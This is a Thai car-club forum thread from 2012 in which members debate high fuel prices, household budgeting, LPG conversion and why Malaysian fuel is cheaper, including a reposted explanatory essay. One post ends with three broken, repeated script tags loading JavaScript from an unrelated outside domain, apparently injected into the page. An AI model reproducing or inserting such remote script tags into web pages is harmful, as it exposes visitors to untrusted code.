ตอบ
ham_ter

ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 23 มีนา 2012 13:33 - อะไรจะขนาดนั้นครับ
Zenkii พิมพ์ว่า:
ham_ter พิมพ์ว่า:
AofStaR พิมพ์ว่า:
ต่อไปคนใช้รถก้อกินแกลบเถอะครับ

ขอพูดหน่อยเรื่องราคาน้ำมัน เพราะ มาเล และ พม่า เค้าผลิตน้ำมันได้เองเลยถูกกว่าเรา และเค้าไม่อิงราคาสิงคโปร์
หาข้อมูลก่อนที่จะโจมตีนะคะ และอีกอย่างคือ ไทยเราใช้น้ำมันถูกกว่าหลายๆประเทศ ก็ไม่เห็นพูดถึง ไปเทียบกับพวกผลิตน้ำมันเองขายเอง มันก็เลยดูว่าบ้านเราแพงกว่าเค้า
และอีกอย่างถามหน่อยว่า การซื้อรถคันนึงก็ไม่ได้มีแค่ค่าผ่อนรถนี่นา มีค่าน้ำมัน ค่าบำรุงรักษา ค่าจุกจิกอีก
ในเมื่อคุณไม่มีรายได้พร้อมที่จะใช้รถยนต์ หรือ พร้อมที่จะเติมน้ำมัน คุณก็ใช้มอไซค์สิ
สมมุตินะคะสมมุติ คุณมีรายได้ตามเกณท์ 15000 ผอนรถ 7-8000 น้ำมัน 4000 เป็น หมื่นสอง เหลือกิน สามพัน
คุณก็จะดูลำบากในชีวิตเหลือเกิน คุณลองเปลี่ยนมาใช้มอไซค์ไหม ค่าผ่อนรถ 1500-2000 ค่าน้ำมัน 1500 เหลือกินใช้ หมื่นสอง
ลองเปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน สำหรับเรา ค่าผ่อนรถ และเชื้อเพลิง ต้องคิดว่า ไม่เกิน 50% ของรายได้ ค่ากินใช้ 20% ค่าผ่อนของนั่นนี่ 10 % ออมเงิน 10% เผื่อเหลือ เผื่อขาด 10% ทำไมคนเราไม่คิดแบนี้ อย่างเราไม่ได้อวดหรืออะไร เราก็มีรถสองคัน แต่เราพยายามคุมเงินให้ได้ตามนี้ แทนที่จะผ่อนรถคันเดียว หลายหมื่น เราก็เลือกรถเก่า สองคัน เอาให้ผ่อนได้ตามงบประมาณ ค่าน้ำมัน เราใช้คันละหมื่น เราก็เอาไปติดแก๊ส ตอนนี้ ค่าแก๊ส สองคัน แปดพัน ทำไมเราไม่ลองเปลี่ยนวิธีคิด ทำยังไงให้อยู่รอด แทนที่จะมานั่งโอดครวญ
เห็นบ่นน้ำมันแพงกันหลายกระทู้ละ ขอพูดหน่อย ว่าทุกวันนี้ คุณพร้อมหรือยัง มีรายได้พอที่จะใช้รถ โดยไม่ลำบากหรือยัง
ถ้ามันลำบากนัก ก็ลดการใช้รถสิ หรือขายรถไป ใช้รถที่เพียงพอกับรายได้สิ
คนไทยสมัยนี้น่ะ เกินตัว ค่าผ่อนรถ กับค่าน้ำมันบางคน เกือบเท่าเงินเดือนแล้ว ไม่พอก็ขอ แล้วมาโอดครวญว่าชีวิตลำบาก
ไม่ได้ว่าใครนะ แค่เปรียบเทียบให้ฟังว่า แทนที่จะด่าคนอื่น หรือเปรียบเทียบกับชาวบ้าน น่ะ เคยหันมามองตัวเองไหมว่า วันนี้ คุณพร้อมหรือยัง ที่จะแบกรับภาระ ที่จะใช้
ปล.ที่ออกมาปาวๆนี่ คือ อยากให้รัฐบาล เค้าทำอะไร ลดราคาน้ำมันเหรอ หรือ แจก..............เพื่อให้เราใช้สุรุ่ยสุร่ายล่ะ

น้ำมันแพง จำเป็นต้องปรับชีวิต ขายรถ ไปขี่มอไซ ปั่นจักรยานเลยว่างั้น? บ่นไม่ได้เลยว่างั้น?

บางคนเค้ามีเงินซื้อปั้มน้ำมันมาเก็บไว้เป็นของตัวเองได้เลยด้วยซ้ำ เค้ายังบ่นเลยว่าน้ำมันแพง

บ้านผมมีรถ 6 คัน ซื้อสดป้ายแดงทุกคัน มีแต่ผมอ่ะซื้อมือ2 เพราะชอบ ES แต่ก็จ่ายเงินสด ผมยังคิดว่าน้ำมันมันแพงเลย แต่ผมก็เติม 95 ทุกครั้งที่เจอปั้มไหนมี ถ้าผมเข้า Shell ผมก็เติม V Power ด้วยซ้ำ แต่ขอบ่นเหอะ น้ำมัน มันแพงจริงๆ ถึงจะมีปัญญาเติมก็เหอะ แต่มันก็แพงอะ จะบ่น ทำไม มีไรมะ?

ไม่ได้บอกให้ขายรถปั่นจักรยาน แต่บอกมา สามครั้งแล้วว่า
เปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน
น้ำมันแพง ถ้าเติมได้ก็เติม ถ้าเติมไม่ได้ เราก็คิดวิธีที่ให้ประหยัดลงสิ
ตรงไหนของกระทู้ที่บอกให้ขายรถไปซื้อจักยาน แค่บอกว่า
ปรับตัวปรับรายจ่าย ตามค่าเงินในกระเป๋าที่มันลดลง
ถูกไหม พลังงนทางเลือกเหรอ ถ้าคุณไม่พร้อมที่จะจ่าย 4x.xx คุณก็หันไปใช้พลังงานทางเลือก
หรือ เลือกที่จะใช้ หรือไม่ใช้รถถ้ามันไม่คุ้มกับการที่ล้อหมุน ถ้าล้อหมุนแล้วมีรายได้พอที่จะหมุน ถูกไหม
เราน่าจะมาพูดมาดูกันว่า มีวิธีไหนที่จะทำให้ปรับตัว ปรับรายจ่ายให้เข้ากับค่าพลังงาน ถูกไหม

บางคนอ่ะ เค้าก็ไม่ได้คิดอะไรเรื่องน้ำมันแพงแล้วเค้าก็มีปัญญาเติมตามปกติถูกไหม?
แล้วที่เค้าบ่นก็เพราะเค้าอยากบ่นไม่ใช่ว่าไม่อยากเติมแต่อยากบ่นเพื่อเป็นการระบาย ถูกไหม?
แล้วไปบอกเค้าเป็นทางอ้อมว่า ถ้าไม่อยากใช้น้ำมันแพงก็ไปทำอย่างอื่น หรือไปใช้ทางเลือกอื่น แล้วอย่ามาบ่น มันถูกไหม?
เคยเห็นพ่อแม่บ่นมั้ยในชีวิตประจำวัน เคยไปบอกพ่อไปมั้ยว่า ก็ปรับตัวให้เค้ากับหนูสิ ไปใช้ทางเลือกอื่นที่หนูชอบ พ่อกับแม่จะได้ไม่ต้องบ่นหนู เคยมั้ย? ถูกไหม?

ไม่ได้บอกว่าห้ามบ่น ตรงไหนเหรอคะที่บอกว่าห้ามบ่น
แค่อยากจะรู้ แนวคิดของแต่ละคน วิธีปรับตัวของแต่ละคน
ว่าทำยังไง หรือ แบบไหน ไม่ได้บอกว่าห้ามบ่นนี่คะ
แล้วคุณพี่ มีวิธีคิด หรือแนวคิดแบบไหน กับน้ำมันแพง ก็มาแชร์ความคิดกันสิคะ
เพราะกระทู้ทุกอัน ก็เป็นที่ๆ แชร์ประสบการณ์ แนวคิดนี่คะ อุอุ
ได้รับคำขอบคุณจาก: hanaun 
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 23 มีนา 2012 13:34 - อะไรจะขนาดนั้นครับ
nilkung พิมพ์ว่า:
~ สเตฟาน ~ พิมพ์ว่า:
บางทีการเสนอแนะ หรือ การแสดงออกซึ่งความเห็นส่วนตัว

ขอให้ทุกคน..ลองใตร่ตรองสักนิด ก่อนกด..ส่ง
อย่าใช้อารมณ์ในการตอบหรือเสนอแนะในลักษณะเฉือดเฉือน

ขอให้ทุกคน..ลองใจเย็นสักนิดว่า...เรากำลังเสนอแนะ หรือ แสดงออกให้กับเพื่อนของเราอ่านอยู่

ทุกสิ่งอย่าง..เป็นประโยชน์และเปิดโลกทัศน์ใหม่ๆ แต่อยู่ที่ว่า จะนำเสนอมันออกมาเช่นไร

ทำใจร่มๆกันนิดนึงนะ เพื่อนๆทุกคน

เบี่ยงเบนประเด็นนิดนึงครับ เนื่องจากตัวผมก็ไม่ได้มีความเชี่ยวชาญด้านเศรฐกิจ และเป็นกลางทางการเมือง ผมอยากถามแบบเด็กน้อยเลยครับว่า ถ้าเรานำเข้าน้ำมันสำเร็จรูปเลยจากมาเลย์ แล้ว+ภาษีไปนิดหน่อย จะสามารถทำให้เราขายถูกกว่านี้ได้หรือไม่ครับ เพราะเห็นข่าวลักลอบนำน้ำมันจากมาเลย์เข้ามาขายกันเยอะ

ท่าทำได้จริงก็คงดีครับ ที่มาเลย์เขาไม่ให้รถทะเบียนไทยเติมเลยน่ะครับ ปกติแถวบ้านเขาโมกะบะเติมที200ลิตรแล้วมาดูดขายกัน แต่ที่ผมซื้อลิตรละ 25บาท
ได้รับคำขอบคุณจาก: puyzaaaaa  chang167 
nilkung

ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 23 มีนา 2012 13:34 - อะไรจะขนาดนั้นครับ
บางทีการเสนอแนะ หรือ การแสดงออกซึ่งความเห็นส่วนตัว

ขอให้ทุกคน..ลองใตร่ตรองสักนิด ก่อนกด..ส่ง
อย่าใช้อารมณ์ในการตอบหรือเสนอแนะในลักษณะเฉือดเฉือน

ขอให้ทุกคน..ลองใจเย็นสักนิดว่า...เรากำลังเสนอแนะ หรือ แสดงออกให้กับเพื่อนของเราอ่านอยู่

ทุกสิ่งอย่าง..เป็นประโยชน์และเปิดโลกทัศน์ใหม่ๆ แต่อยู่ที่ว่า จะนำเสนอมันออกมาเช่นไร

ทำใจร่มๆกันนิดนึงนะ เพื่อนๆทุกคน

รับทราบค่ะ ขอโทษ ทุกคนที่แรงไปหน่อย
แต่เราก็น่าจะเสนอแนะ วิธีใช้กันสักหน่อย ( หรือเปล่า )
ว่าแต่ละคนมีแนวคิดปรับตัวกันอย่างไร กับสิ่งที่เรียกว่า "น้ำมันแพง" หรือว่าไงคะ

ส่วนตัวผมรายได้ไม่เยอะมาก ด้วยมีครอบครัวมีลูกน้อย จริงๆแล้วก็อยากขี่มอไซค์ แต่ยากครับ ผมอยู่ต่างจังหวัด ใช้รถเฉลี่ยวันละ 70 กม. ถนนที่ใช้เป็นเลนเดียววิ่งสวนกันแบบไม่มีเกาะกลางถนน ลูกน้อยก็ซนไม่อยู่นิ่ง เดินทางกลางคืนประมาณเที่ยงคืนแทบทุกวัน ถนนไฟส่องสว่างไม่เพียงพอ จึงคิดว่าใช้รถยนต์สะดวกกว่า รายได้พอประมาณไม่มาก แต่ออกรถมาปุ๊บติดแก๊สปั๊บ+ยับยั้งกิเลสยั่วใจจากของแต่ง ก็โอเคคับ อยู่ได้อย่างพอเพียง แม้ช่วงนี้ราคาแก๊สจะขยับขึ้นเรื่อยๆ
ได้รับคำขอบคุณจาก: tun221  yorkydog 
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 23 มีนา 2012 13:35 - อะไรจะขนาดนั้นครับ
ไม่มีตังค์เติมเต็มถัง ใช้แก๊ส จบม่ะ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: nooduean_69 
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 13:37 - อะไรจะขนาดนั้นครับ
Cra2yLov3 พิมพ์ว่า:

เบี่ยงเบนประเด็นนิดนึงครับ เนื่องจากตัวผมก็ไม่ได้มีความเชี่ยวชาญด้านเศรฐกิจ และเป็นกลางทางการเมือง ผมอยากถามแบบเด็กน้อยเลยครับว่า ถ้าเรานำเข้าน้ำมันสำเร็จรูปเลยจากมาเลย์ แล้ว+ภาษีไปนิดหน่อย จะสามารถทำให้เราขายถูกกว่านี้ได้หรือไม่ครับ เพราะเห็นข่าวลักลอบนำน้ำมันจากมาเลย์เข้ามาขายกันเยอะ

ท่าทำได้จริงก็คงดีครับ ที่มาเลย์เขาไม่ให้รถทะเบียนไทยเติมเลยน่ะครับ ปกติแถวบ้านเขาโมกะบะเติมที200ลิตรแล้วมาดูดขายกัน แต่ที่ผมซื้อลิตรละ 25บาท

อืมนั่นสิ ถ้าทำได้จริงก็คงจะดี แต่ที่เค้าลักลอบกันก็น่าจะมีนะ ไกลบ้านอ่ะ ไม่รู้
ใครอยู่แถวใต้บ้าง เค้าทำกันอย่างไร
Cra2yLov3

ศุกร์, 23 มีนา 2012 13:40 - อะไรจะขนาดนั้นครับ

อืมนั่นสิ ถ้าทำได้จริงก็คงจะดี แต่ที่เค้าลักลอบกันก็น่าจะมีนะ ไกลบ้านอ่ะ ไม่รู้
ใครอยู่แถวใต้บ้าง เค้าทำกันอย่างไร

หลายวิธีครับ เยอะขอไม่บอกวิธีละกันเพื่อความเป็นอยู่ของที่ดีของชาวบ้านแถวนั่น
Juris

ชื่อเล่น: เม

เข้าร่วม: 01 ตุลา 2008
ตอบ: 780

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1697
ให้คำขอบคุณ: 1333

ศุกร์, 23 มีนา 2012 13:40 - อะไรจะขนาดนั้นครับ
วันศุกร์ที่ 20 พฤศจิกายน พ.ศ. 2552
ทำไมราคาเชื้อเพลิงมาเลเซียถูกกว่าไทย? เราต้องทำอย่างไรถึงจะได้ใช้เชื้อเพลิงถูกอย่างมาเลเซีย
เชื่อว่าคงยังเป็นที่สงสัยของใครหลายๆ คน ว่าทำไมมาเลเซียขายเชื้อเพลิงถูกกว่าเรา แต่ก็ไม่มีใครไปหาเหตุผลมาบอกได้ว่ามาเลเซียเขาทำอย่างไร มีแต่คนที่ไม่หวังดีต่อประเทศเอาข้อเท็จจริงอันนี้ มาโจมตีบริษัทบางบริษัทว่าเอาเปรียบประชาชน และรัฐบาลว่าเก็บภาษีขูดเลือดขูดเนื้อคนไทย ราคาเชื้อเพลิงจึงแพง โดยไม่ดูสาเหตุอื่นประกอบเลย ดูแต่เรื่องราคา (อีกแล้ว) ผมจะพาไปดูกันนะ ว่ามาเลเซียเขาเป็นอย่างไร และทำอะไร ถึงทำให้ราคาเชื้อเพลิงถูก และสุดท้ายผู้อ่านก็ตัดสินกันเองละกัน ว่าอยากให้เมืองไทยเป็นแบบนั้นหรือไม่

หากคุณลองหาข้อมูลจากเวบไซต์ของปิโตรนาส แล้วศึกษาเองนะ จะพบความเป็นจริงดังต่อไปนี้

1. ปิโตรนาส ซึ่งเป็นของรัฐบาลมาเลเซีย กำไรมากกว่า ปตท อยู่อันดับสูงกว่าในเวทีโลกด้วยซ้ำ

2. งงไหมว่าทำไมเขาขายในประเทศถูก แต่รวยกว่าปตท??? เพราะปิโตรนาสเขาขุดก๊าซ/น้ำมันดิบขึ้นมา แล้วส่งออกน่ะสิ ส่งไปแถบ ญี่ปุ่น เกาหลี และอื่นๆ ขายได้แพงกว่าตั้ง 3-4 เท่าของราคาก๊าซในประเทศไทยนะ

3. อาจมีคนเถียงว่า ได้ยินว่าประเทศไทยเราก็ส่งออกหนิ น่าจะรวย... อย่าลืมว่าไทยเรานำเข้าน้ำมันดิบกว่า80% มากลั่นในประเทศ ได้น้ำมันสำเร็จรูป ถ้าเหลือเกินความต้องการในประเทศจึงส่งออก ไทยจึงได้แค่ค่าการกลั่น และปริมาณน้ำมันสำเร็จรูปที่ส่งออกนั้นจิ๊บจ้อยมาก แต่ที่มาเลเขาส่งออกนั้น ไม่ได้เป็นกำไรจากค่าการกลั่น มันเป็นกำไรจากธุรกิจสำรวจ ขุดเจาะ และผลิต ซึ่งรุ้ๆ กันว่า ธุรกิจนี้ High risk High Return (ใครยังไม่เข้าใจความแตกต่างระหว่างธุรกิจสำรวจ ขุดเจาะ และผลิต กับธุรกิจโรงกลั่น กรุณากลับไปอ่าน Episode I ถึง IV ดูก่อนนะ จะเข้าใจมากขึ้น)

4. กำไรปตท ของไทย จึงเทียบปิโตรนาสไม่ติด เพราะ ไทยไม่ได้ทำเพื่อการส่งออกอย่างปิโตรนาส ไทยไม่สามารถส่งออกได้เพราะลำพังกำลังการผลิตก๊าซและน้ำมันดิบในประเทศตอนนี้ก็ไม่พอกับคน 63 ล้านคนในประเทศแล้ว ต้องนำเข้าก๊าซประมาณ 30% ของการใช้ก๊าซทั่วประเทศ และน้ำมันดิบกว่า 80% ของการใช้น้ำมันดิบทั่วประเทศ ในขณะที่ีมาเล มีคนน้อยกว่าตั้งเยอะ (ประมาณ 27 ล้านคน) กำลังการผลิตเขามีเกินพอ จึงส่งออกได้ สถานการณ์มันต่างกันครับ จึงเทียบกันไม่ได้หรอก

5. ดังนั้น สิ่งที่มาเลทำ ตอนนี้ คือขุดทรัพยากรในประเทศ แล้วส่งออกไปขายนอกประเทศน่ะสิ!!! คนไทยยอมมั้ยล่ะ?? ขุดจากใต้ประเทศเราเอง แล้วเอาไปให้ประเทศอื่นใช้??

6. ตอนผมได้ยินการเปรียบเทียบเรื่องราคาเชื้อเพลิงของประเทศเรา กับมาเลครั้งแรก ผมฉุกคิดขึ้นมาทันทีว่า แล้วประเทศเพื่อนบ้านเราประเทศอื่นล่ะ พม่า ลาว กัมพูชา ที่ด้อยพัฒนากว่าเรา ค่าครองชีพถูกกว่าเรา ราคาเชื้อเพลิงเขาเป็นยังไง??? เกิดความสงสัยครับ เพราะเหมือนว่าคนที่เอาเรื่องมาเลมาพูดนั้น พูดไม่หมด ไม่ยอมเอาข้อมูลประเทศอื่นรอบๆไทย มาบอกด้วย...แล้วก็เป็นจริงอย่างที่ผมคิดครับ ราคา LPG ย้ำนะครับ LPG ที่ใช้หุงต้มในครัวเรือน ของเพื่อนบ้านเรา แพงกว่าที่เราใช้ทั้งหมด ทั้งๆที่ค่าครองชีพเขาต่ำกว่าเรามาก แต่ครัวเรือนเขากลับต้องจ่ายแพงกว่า สรุปว่า ไทยเราขาย LPG ถูกที่สุด เป็นลำดับที่สองของอาเซียน!!! รองจากมาเล เคยดูข้อมูลพวกนี้ประกอบบ้างไหมครับ???

7. มาเลขายน้ำมันถูก เพราะรัฐช่วยตรึงราคามาก (แต่ไทยรัฐเก็บภาษีหนักหน่วง) โดยเอาเงินที่กำไรมหาศาล จากการส่งออกก๊าซ/น้ำมันดิบ มาช่วยตรึงราคา นั่นแหละ ถามว่าเมืองไทยจะเอาบ้างไหมล่ะ ขุดในประเทศ แล้วส่งออกไปให้คนอื่นใช้ แล้วเอากำไรตรงนั้นมาเข้ากองทุนให้รัฐตรึงราคาให้ ยอมรับกันได้หรือเปล่า นี่แหละ เหตุผลที่ประเทศเค้าราคาถูก

สรุปคือ
แนวทางที่จะทำให้ราคาเชื้อเพลิงในประเทศเราถูกอย่างมาเลเซียคือ
1. คนไทยช่วยกันประหยัดพลังงานให้ไม่ต้องมีการนำเข้าอีกต่อไป จนมีเหลือใช้ (ซึ่งจะเกิดขึ้นก็ต่อเมื่อคนไทยต้องใช้เชื้อเพลิงเพียง 20% ของที่ใช้กันอยู่ตอนนี้ เคยขับรถเดือนละ 30 วัน ลดให้เหลือเพียง 6 วันต่อเดือน นอกนั้นขี่จักรยาน/เดินไปนะ ห้ามนั่งรถเมล์ เพราะรถเมล์ก็ต้องใช้เชื้อเพลิง)
2. เมื่อไม่ต้องนำเข้าและมีเชื้อเพลิงเหลือใช้แล้ว ก็ให้ขุดเชื้อเพลิงที่เหลืออยู่ ส่งออกไปขายให้ประเทศอื่นให้หมด โดยไม่ต้องคำนึงถึงว่าจะไม่เหลือเชื้อเพลิงให้ลูกหลานไทยในอนาคตใช้กัน เพื่อให้ได้กำไรจากการส่งออกเชื้อเพลิง มาเข้ากองทุนน้ำมัน ลดภาระให้กับผู้บริโภค

ปัญหาไม่ได้อยู่ที่ ปตท หรือ รัฐบาล แต่อยู่ที่คนไทยทุกคนที่ไม่เคยมีความคิดที่จะประหยัดพลังงานอยู่ในหัว จนสุดท้ายประเทศต้องเสียเงินนำเข้ามหาศาล และพอราคาแพงตามตลาดโลกที่ไปนำเข้ามา ก็กลับโทษผู้ขาย ทั้งๆที่ต้นตอของสาเหตุมันอยู่ที่ผู้ใช้ ที่ใช้อย่างไม่รู้จักความพอดี ระงับกิเลสตัณหาตัวเองไม่ได้ และนอกจากนี้ ผมอยากจะรู้ว่า มีคนไทยคนไหนมั่ง ที่มีเห็นด้วยกับแนวคิดที่จะขุดทรัพยากรในประเทศ ส่งออกไปให้ประเทศอื่นแบบที่ประเทศมาเลเซียทำ??? ถ้ามันยังเป็นไปไม่ได้ ก็เลิกคิดเลิกหวังซะเถอะครับ ที่จะให้ราคาเชื้อเพลิงไทยต่ำเท่ามาเลเซีย เพราะถ้าให้รัฐบาลไทยช่วย Subsidize ราคาแบบมาเลเซียนะ งบทั้งกระทรวงจะพอรึเปล่ายังไม่รู้เลย จะให้รัฐหาเงินจากไหนกัน...

สุดท้ายนี้ ก็เหมือนเดิมครับ..อย่าพึ่งเชื่อผม ไปศึกษาบริษัทปิโตรนาสดูจากเวบไซต์ด้วยตัวคุณเอง แล้วดูซิว่า ผมพูดถูกหรือเปล่า ++++

น่าจะอ้างอิงแหล่งที่มาด้วยนะครับ เผื่อเพื่อนๆ อยากศึกษาเพิ่มเติม หรือทราบต้นตอของบทความอ่ะ
ยังไงก็ขอบคุณที่แบ่งปัน ส่วนจะเชื่อหรือไม่ มีวิธีคิดและตอบสนองอย่างไรก็เรื่องของตัวบุคคลครับ
ได้รับคำขอบคุณจาก: Phetcharat  hacker  kim_possible 
Zenkii

ชื่อเล่น: มี่

เข้าร่วม: 21 ธันวา 2010
ตอบ: 403

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 922

ที่อยู่: ดอนเมือง หมู่บ้านศิริสุข หลักสี่ แจ้งวัฒนะ ถนนวิภาวดีรังสิต รังสิต Wash United Donmueang
ศุกร์, 23 มีนา 2012 13:41 - อะไรจะขนาดนั้นครับ
ต่อไปคนใช้รถก้อกินแกลบเถอะครับ

ขอพูดหน่อยเรื่องราคาน้ำมัน เพราะ มาเล และ พม่า เค้าผลิตน้ำมันได้เองเลยถูกกว่าเรา และเค้าไม่อิงราคาสิงคโปร์
หาข้อมูลก่อนที่จะโจมตีนะคะ และอีกอย่างคือ ไทยเราใช้น้ำมันถูกกว่าหลายๆประเทศ ก็ไม่เห็นพูดถึง ไปเทียบกับพวกผลิตน้ำมันเองขายเอง มันก็เลยดูว่าบ้านเราแพงกว่าเค้า
และอีกอย่างถามหน่อยว่า การซื้อรถคันนึงก็ไม่ได้มีแค่ค่าผ่อนรถนี่นา มีค่าน้ำมัน ค่าบำรุงรักษา ค่าจุกจิกอีก
ในเมื่อคุณไม่มีรายได้พร้อมที่จะใช้รถยนต์ หรือ พร้อมที่จะเติมน้ำมัน คุณก็ใช้มอไซค์สิ
สมมุตินะคะสมมุติ คุณมีรายได้ตามเกณท์ 15000 ผอนรถ 7-8000 น้ำมัน 4000 เป็น หมื่นสอง เหลือกิน สามพัน
คุณก็จะดูลำบากในชีวิตเหลือเกิน คุณลองเปลี่ยนมาใช้มอไซค์ไหม ค่าผ่อนรถ 1500-2000 ค่าน้ำมัน 1500 เหลือกินใช้ หมื่นสอง
ลองเปลี่ยนวิธีคิด ชีวิตก็เปลี่ยน สำหรับเรา ค่าผ่อนรถ และเชื้อเพลิง ต้องคิดว่า ไม่เกิน 50% ของรายได้ ค่ากินใช้ 20% ค่าผ่อนของนั่นนี่ 10 % ออมเงิน 10% เผื่อเหลือ เผื่อขาด 10% ทำไมคนเราไม่คิดแบนี้ อย่างเราไม่ได้อวดหรืออะไร เราก็มีรถสองคัน แต่เราพยายามคุมเงินให้ได้ตามนี้ แทนที่จะผ่อนรถคันเดียว หลายหมื่น เราก็เลือกรถเก่า สองคัน เอาให้ผ่อนได้ตามงบประมาณ ค่าน้ำมัน เราใช้คันละหมื่น เราก็เอาไปติดแก๊ส ตอนนี้ ค่าแก๊ส สองคัน แปดพัน ทำไมเราไม่ลองเปลี่ยนวิธีคิด ทำยังไงให้อยู่รอด แทนที่จะมานั่งโอดครวญ
เห็นบ่นน้ำมันแพงกันหลายกระทู้ละ ขอพูดหน่อย ว่าทุกวันนี้ คุณพร้อมหรือยัง มีรายได้พอที่จะใช้รถ โดยไม่ลำบากหรือยัง
ถ้ามันลำบากนัก ก็ลดการใช้รถสิ หรือขายรถไป ใช้รถที่เพียงพอกับรายได้สิ
คนไทยสมัยนี้น่ะ เกินตัว ค่าผ่อนรถ กับค่าน้ำมันบางคน เกือบเท่าเงินเดือนแล้ว ไม่พอก็ขอ แล้วมาโอดครวญว่าชีวิตลำบาก
ไม่ได้ว่าใครนะ แค่เปรียบเทียบให้ฟังว่า แทนที่จะด่าคนอื่น หรือเปรียบเทียบกับชาวบ้าน น่ะ เคยหันมามองตัวเองไหมว่า วันนี้ คุณพร้อมหรือยัง ที่จะแบกรับภาระ ที่จะใช้
ปล.ที่ออกมาปาวๆนี่ คือ อยากให้รัฐบาล เค้าทำอะไร ลดราคาน้ำมันเหรอ หรือ แจก..............เพื่อให้เราใช้สุรุ่ยสุร่ายล่ะ

เหรออออออออออออออออ

ในเมื่อคุณไม่มีรายได้พร้อมที่จะใช้รถยนต์ หรือ พร้อมที่จะเติมน้ำมัน คุณก็ใช้มอไซค์สิ (แปลในความคิดผมก็คือ ไม่มีปัญญาใช้ ก็ไปขี่มอไซซะ )

แทนที่จะมานั่งโอดครวญ
ไม่ได้ว่าใครนะ แค่เปรียบเทียบให้ฟังว่า แทนที่จะด่าคนอื่น หรือเปรียบเทียบกับชาวบ้าน น่ะ เคยหันมามองตัวเองไหมว่า วันนี้ คุณพร้อมหรือยัง ที่จะแบกรับภาระ ที่จะใช้ ( อย่ามาบ่น ไปปรับตัวเองซะไป ลำบากนักก็ไม่ต้องเติม อย่ามาโอดครวญน้ำมันแพง )

เหรอออออออออออออออออออออออออ

แก้ไขล่าสุดโดย เมื่อ ศุกร์, 23 มีนา 2012 13:45, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: kaisuh  puyzaaaaa  AofStaR  kim_possible  Edan  yorkydog  hacker  gahn27  chang167  moonoy 
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 13:42 - อะไรจะขนาดนั้นครับ
Juris พิมพ์ว่า:
วันศุกร์ที่ 20 พฤศจิกายน พ.ศ. 2552
ทำไมราคาเชื้อเพลิงมาเลเซียถูกกว่าไทย? เราต้องทำอย่างไรถึงจะได้ใช้เชื้อเพลิงถูกอย่างมาเลเซีย
เชื่อว่าคงยังเป็นที่สงสัยของใครหลายๆ คน ว่าทำไมมาเลเซียขายเชื้อเพลิงถูกกว่าเรา แต่ก็ไม่มีใครไปหาเหตุผลมาบอกได้ว่ามาเลเซียเขาทำอย่างไร มีแต่คนที่ไม่หวังดีต่อประเทศเอาข้อเท็จจริงอันนี้ มาโจมตีบริษัทบางบริษัทว่าเอาเปรียบประชาชน และรัฐบาลว่าเก็บภาษีขูดเลือดขูดเนื้อคนไทย ราคาเชื้อเพลิงจึงแพง โดยไม่ดูสาเหตุอื่นประกอบเลย ดูแต่เรื่องราคา (อีกแล้ว) ผมจะพาไปดูกันนะ ว่ามาเลเซียเขาเป็นอย่างไร และทำอะไร ถึงทำให้ราคาเชื้อเพลิงถูก และสุดท้ายผู้อ่านก็ตัดสินกันเองละกัน ว่าอยากให้เมืองไทยเป็นแบบนั้นหรือไม่

หากคุณลองหาข้อมูลจากเวบไซต์ของปิโตรนาส แล้วศึกษาเองนะ จะพบความเป็นจริงดังต่อไปนี้

1. ปิโตรนาส ซึ่งเป็นของรัฐบาลมาเลเซีย กำไรมากกว่า ปตท อยู่อันดับสูงกว่าในเวทีโลกด้วยซ้ำ

2. งงไหมว่าทำไมเขาขายในประเทศถูก แต่รวยกว่าปตท??? เพราะปิโตรนาสเขาขุดก๊าซ/น้ำมันดิบขึ้นมา แล้วส่งออกน่ะสิ ส่งไปแถบ ญี่ปุ่น เกาหลี และอื่นๆ ขายได้แพงกว่าตั้ง 3-4 เท่าของราคาก๊าซในประเทศไทยนะ

3. อาจมีคนเถียงว่า ได้ยินว่าประเทศไทยเราก็ส่งออกหนิ น่าจะรวย... อย่าลืมว่าไทยเรานำเข้าน้ำมันดิบกว่า80% มากลั่นในประเทศ ได้น้ำมันสำเร็จรูป ถ้าเหลือเกินความต้องการในประเทศจึงส่งออก ไทยจึงได้แค่ค่าการกลั่น และปริมาณน้ำมันสำเร็จรูปที่ส่งออกนั้นจิ๊บจ้อยมาก แต่ที่มาเลเขาส่งออกนั้น ไม่ได้เป็นกำไรจากค่าการกลั่น มันเป็นกำไรจากธุรกิจสำรวจ ขุดเจาะ และผลิต ซึ่งรุ้ๆ กันว่า ธุรกิจนี้ High risk High Return (ใครยังไม่เข้าใจความแตกต่างระหว่างธุรกิจสำรวจ ขุดเจาะ และผลิต กับธุรกิจโรงกลั่น กรุณากลับไปอ่าน Episode I ถึง IV ดูก่อนนะ จะเข้าใจมากขึ้น)

